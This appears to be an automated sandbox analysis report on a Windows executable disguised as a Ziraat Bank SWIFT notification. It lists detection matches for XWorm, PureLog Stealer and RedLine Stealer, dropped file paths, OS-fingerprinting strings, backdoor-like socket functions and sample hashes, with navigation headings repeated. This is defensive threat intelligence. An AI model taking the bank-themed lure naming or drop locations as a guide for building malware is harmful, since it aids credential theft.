Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

OS version to string mapping found (often used in BOTs)

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_81
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XPe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_VISTA
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_7
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_8
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1645186
Product:	CloudBasic
Start time:	15:07:35
Start date:	21.03.2025
Sample:	Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	cddaeb64c402c6127545f151590c5d20
SHA1:	f62cfcc6347fdfdbe503daaa6b7cdee1ccb1d0ed
SHA256:	8e8b85ca1b4d5b6d629c758ec683a2530e54fc57e51d273e07e5d4f6f016dc72
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Malware Threat Intel
Provided by